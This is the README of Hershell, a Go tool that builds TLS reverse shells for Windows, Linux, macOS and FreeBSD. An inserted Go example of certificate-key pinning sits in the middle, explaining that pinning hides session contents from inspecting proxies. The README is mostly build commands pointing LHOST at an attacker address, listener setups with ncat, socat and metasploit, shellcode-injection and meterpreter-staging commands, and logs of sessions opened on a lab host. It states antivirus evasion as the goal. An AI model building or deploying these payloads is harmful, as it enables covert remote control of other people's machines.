lesnuages / Hershell

Licence: bsd-3-clause
Multiplatform reverse shell generator


Hershell

Simple TCP reverse shell written in Go.

It uses TLS to secure the communications and provides certificate public key fingerprint pinning, which prevents traffic interception.
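The pinning check described above, as an added example that is not Hershell's own code: a Go client tls.Config that switches off CA chain validation (the listener's certificate is self-signed, as `make depends` produces it) and instead accepts only a peer whose SubjectPublicKeyInfo SHA-256 matches a hard-coded pin. The example runs the check end to end against a TLS listener on loopback, once with the pinned key and once with a freshly generated key under the same name, which is what a re-signing interception proxy would present. The choice of SPKI as the hashed object, all function names, and the in-memory self-signed certificate are assumptions; the page does not say exactly what Hershell hashes or how the pin is embedded in the payload.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/hex"
	"errors"
	"fmt"
	"math/big"
	"time"
)

// newSelfSignedCert builds an in-memory self-signed certificate. It stands in
// for the server.pem/server.key pair that `make depends` generates with openssl
// (assumption: key type and validity period are illustrative, not Hershell's).
func newSelfSignedCert(cn string) (tls.Certificate, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return tls.Certificate{}, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: cn},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return tls.Certificate{}, err
	}
	return tls.Certificate{Certificate: [][]byte{der}, PrivateKey: key}, nil
}

// SPKIFingerprint returns the hex SHA-256 digest of the certificate's
// SubjectPublicKeyInfo: a fingerprint of the public key, not of the whole
// certificate (assumed pinning target; the page does not specify it).
func SPKIFingerprint(certDER []byte) (string, error) {
	cert, err := x509.ParseCertificate(certDER)
	if err != nil {
		return "", err
	}
	sum := sha256.Sum256(cert.RawSubjectPublicKeyInfo)
	return hex.EncodeToString(sum[:]), nil
}

// PinnedClientConfig returns a client tls.Config that accepts exactly one
// public key. Chain validation is disabled because a self-signed listener
// certificate chains to nothing; the callback is the real check and compares
// fingerprints in constant time.
func PinnedClientConfig(pin string) *tls.Config {
	return &tls.Config{
		InsecureSkipVerify: true, // replaced by VerifyPeerCertificate below
		VerifyPeerCertificate: func(rawCerts [][]byte, _ [][]*x509.Certificate) error {
			if len(rawCerts) == 0 {
				return errors.New("pin check: peer presented no certificate")
			}
			got, err := SPKIFingerprint(rawCerts[0])
			if err != nil {
				return err
			}
			if subtle.ConstantTimeCompare([]byte(got), []byte(pin)) != 1 {
				return fmt.Errorf("pin check: fingerprint %s does not match pin", got)
			}
			return nil
		},
	}
}

// HandshakeAgainst starts a TLS listener on loopback presenting serverCert and
// connects to it with a client pinned to pin. It returns nil when the handshake
// succeeds and the client's verification error otherwise.
func HandshakeAgainst(serverCert tls.Certificate, pin string) error {
	ln, err := tls.Listen("tcp", "127.0.0.1:0", &tls.Config{Certificates: []tls.Certificate{serverCert}})
	if err != nil {
		return err
	}
	defer ln.Close()
	go func() {
		// Server side: accept one connection and run the handshake; only the
		// client's verdict matters for the return value.
		c, err := ln.Accept()
		if err != nil {
			return
		}
		c.(*tls.Conn).Handshake()
		c.Close()
	}()
	conn, err := tls.Dial("tcp", ln.Addr().String(), PinnedClientConfig(pin))
	if err != nil {
		return err
	}
	return conn.Close()
}

func main() {
	listener, err := newSelfSignedCert("listener")
	if err != nil {
		panic(err)
	}
	pin, _ := SPKIFingerprint(listener.Certificate[0])
	fmt.Println("pin:", pin)
	fmt.Println("listener's own key:", HandshakeAgainst(listener, pin))
	resigned, _ := newSelfSignedCert("listener") // same name, different key
	fmt.Println("re-signed cert:    ", HandshakeAgainst(resigned, pin))
}
```

The equivalent pin for the server.pem that `make depends` writes can be computed with `openssl x509 -in server.pem -pubkey -noout | openssl pkey -pubin -outform der | openssl dgst -sha256`. Pinning the key rather than the whole certificate survives re-issuing the certificate with the same key but not renewal with a fresh one. In either form, a TLS-inspecting proxy that re-signs the connection is rejected at the handshake, so a network defender cannot see the content of such a session and has to detect it from connection metadata (destination, timing, the handshake itself) rather than from the traffic inside it.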

Supported operating systems:

  • Windows
  • Linux
  • Mac OS
  • FreeBSD and derivatives

Why ?

Although meterpreter payloads are great, they are sometimes spotted by AV products.

The goal of this project is to get a simple reverse shell, which can work on multiple systems.

How ?

Since it's written in Go, you can cross compile the source for the desired architecture.

Getting started & dependencies

As this is a Go project, you will need to follow the official documentation to set up your Golang environment (with the $GOPATH environment variable).

Then, just run go get github.com/lesnuages/hershell to fetch the project.

Building the payload

To simplify things, you can use the provided Makefile. You can set the following environment variables:

  • GOOS : the target OS
  • GOARCH : the target architecture
  • LHOST : the attacker IP or domain name
  • LPORT : the listener port

For the GOOS and GOARCH variables, you can get the allowed values here.

Alternatively, some helper targets are available in the Makefile:

  • depends : generate the server certificate (required for the reverse shell)
  • windows32 : builds a Windows 32-bit executable (PE 32-bit)
  • windows64 : builds a Windows 64-bit executable (PE 64-bit)
  • linux32 : builds a Linux 32-bit executable (ELF 32-bit)
  • linux64 : builds a Linux 64-bit executable (ELF 64-bit)
  • macos32 : builds a Mac OS 32-bit executable (Mach-O)
  • macos64 : builds a Mac OS 64-bit executable (Mach-O)

For those targets, you just need to set the LHOST and LPORT environment variables.

Using the shell

Once executed, you will be provided with a remote shell. This custom interactive shell will allow you to execute system commands through cmd.exe on Windows, or /bin/sh on UNIX machines.

The following special commands are supported:

  • run_shell : drops you into a system shell (allowing you, for example, to change directories)
  • inject <base64 shellcode> : injects a base64-encoded shellcode into the current process memory and executes it
  • meterpreter [tcp|http|https] IP:PORT : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter from metasploit, and executes the shellcode in memory (Windows only at the moment)
  • exit : exits gracefully

Usage

First of all, you will need to generate a valid certificate:

$ make depends
openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
....................................................................................++
.....++
writing new private key to 'server.key'
-----
cat server.key >> server.pem

For Windows:

# Predefined 32 bit target
$ make windows32 LHOST=192.168.0.12 LPORT=1234
# Predefined 64 bit target
$ make windows64 LHOST=192.168.0.12 LPORT=1234

For Linux:

# Predefined 32 bit target
$ make linux32 LHOST=192.168.0.12 LPORT=1234
# Predefined 64 bit target
$ make linux64 LHOST=192.168.0.12 LPORT=1234

For Mac OS X:

$ make macos LHOST=192.168.0.12 LPORT=1234

Examples

Basic usage

One can use various tools to handle incoming connections, such as:

  • socat
  • ncat
  • openssl server module
  • metasploit multi handler (with a python/shell_reverse_tcp_ssl payload)

Here is an example with ncat:

$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 172.16.122.105.
Ncat: Connection from 172.16.122.105:47814.
[hershell]> whoami
desktop-3pvv31a\lab

Here is an example with socat (tested with version 1.7.3.2):

$ socat `tty` OPENSSL-LISTEN:1234,reuseaddr,cert=server.pem,key=server.key,verify=0
# connection would be initiated here
[hershell]> whoami
desktop-3pvv31a\lab

Meterpreter staging

WARNING: this currently only works for the Windows platform.

The meterpreter staging currently supports the following payloads:

  • windows/meterpreter/reverse_tcp
  • windows/x64/meterpreter/reverse_tcp
  • windows/meterpreter/reverse_http
  • windows/x64/meterpreter/reverse_http
  • windows/meterpreter/reverse_https
  • windows/x64/meterpreter/reverse_https

To use the correct one, just specify the transport you want to use (tcp, http or https).

To use the meterpreter staging feature, just start your handler:

[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler
[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105
lhost => 172.16.122.105
[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443
lport => 8443
[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem
HandlerSSLCert => ./server.pem
[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.

[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >

Then, in hershell, use the meterpreter command:

[hershell]> meterpreter https 172.16.122.105:8443

A new meterpreter session should pop in msfconsole:

[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
[*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ...
[*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100

[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  DESKTOP-3PVV31A\lab @ DESKTOP-3PVV31A  172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15)

[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-3PVV31A\lab

Credits

@khast3x for the Dockerfile feature
